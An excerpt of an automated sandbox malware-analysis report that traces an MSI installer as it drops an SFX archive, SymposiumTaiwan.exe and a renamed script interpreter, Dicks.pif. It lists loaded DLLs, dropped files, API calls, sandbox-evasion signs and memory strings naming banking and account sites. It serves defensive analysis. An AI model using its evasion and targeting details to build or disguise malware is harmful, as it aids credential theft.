              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\System32\msiexec.exeAutomated click: Next >
              Source: C:\Windows\System32\msiexec.exeAutomated click: Next >
              Source: C:\Windows\System32\msiexec.exeAutomated click: Install
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifAutomated click: OK
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: NB4EASbynx.msiStatic file information: File size 2580992 > 1048576
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MSI53B9.tmp, 00000004.00000000.2201198694.00000000008A0000.00000002.00000001.01000000.00000003.sdmp, MSI53B9.tmp, 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmp, NB4EASbynx.msi, 68e8f1.msi.2.dr, MSI53B9.tmp.1.dr, 68e8ef.msi.2.dr
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: NB4EASbynx.msi, MSIEA95.tmp.2.dr, MSIC706.tmp.1.dr, MSI52AE.tmp.1.dr, 68e8f1.msi.2.dr, MSI527E.tmp.1.dr, MSI523E.tmp.1.dr, MSIEAB6.tmp.2.dr, MSI4F6E.tmp.1.dr, MSI5124.tmp.1.dr
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeCode function: 8_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,8_2_00406328
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_6837546Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0088D8B6 push ecx; ret 4_2_0088D8C9
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0088CDF0 push eax; ret 4_2_0088CE0E
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00058B75 push ecx; ret 19_2_00058B88
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0004CBDB push eax; retf 19_2_0004CBF8
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00058B75 push ecx; ret 23_2_00058B88
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0004CBDB push eax; retf 23_2_0004CBF8
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E9F23A push eax; ret 23_2_00E9F23D
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00EA299E push ss; iretd 23_2_00EA2A21
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00EA2AAE pushad ; iretd 23_2_00EA2AC5
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00EA2A42 push ss; iretd 23_2_00EA2A55
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00EA2A22 push ss; iretd 23_2_00EA2A25
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00EA2A32 pushad ; iretd 23_2_00EA2A35
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00EA3EC4 push esp; iretd 23_2_00EA3EC5

              Persistence and Installation Behavior

              barindex
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI523E.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA27.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI52AE.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpFile created: C:\Users\user\Desktop\SymposiumTaiwan.exeJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI537A.tmpJump to dropped file
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA95.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5124.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI527E.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEAB6.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIC706.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI4F6E.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA27.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA95.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEAB6.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000B59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,19_2_000B59B3
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00045EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,19_2_00045EDA
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_000B59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,23_2_000B59B3
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00045EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,23_2_00045EDA
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000533B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_000533B7
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeStalling execution: Execution stalls by calling Sleepgraph_8-3879
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI523E.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEA27.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI52AE.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI537A.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEA95.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5124.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI527E.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEAB6.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI4F6E.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC706.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifAPI coverage: 6.6 %
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifAPI coverage: 0.6 %
              Source: C:\Windows\SysWOW64\timeout.exe TID: 3424Thread sleep count: 42 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif TID: 6260Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif TID: 5476Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0087A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,4_2_0087A273
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0088A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,4_2_0088A537
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_00897D78 FindFirstFileExA,4_2_00897D78
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeCode function: 8_2_00406301 FindFirstFileW,FindClose,8_2_00406301
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeCode function: 8_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,8_2_00406CC7
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00094005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00094005
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0009494A GetFileAttributesW,FindFirstFileW,FindClose,19_2_0009494A
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0009FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_0009FA36
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0009C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,19_2_0009C2FF
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0009CD14 FindFirstFileW,FindClose,19_2_0009CD14
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0009CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,19_2_0009CD9F
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0009F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_0009F5D8
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0009F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_0009F735
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00093CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00093CE2
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00094005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_00094005
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0009C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,23_2_0009C2FF
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0009494A GetFileAttributesW,FindFirstFileW,FindClose,23_2_0009494A
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0009CD14 FindFirstFileW,FindClose,23_2_0009CD14
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0009CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,23_2_0009CD9F
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0009F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_0009F5D8
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0009F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_0009F735
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0009FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,23_2_0009FA36
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00093CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_00093CE2
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0088C8D5 VirtualQuery,GetSystemInfo,4_2_0088C8D5
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: Dicks.pif, 00000017.00000003.3264421996.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266103716.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3182152456.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3155264925.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3234780524.0000000001173000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
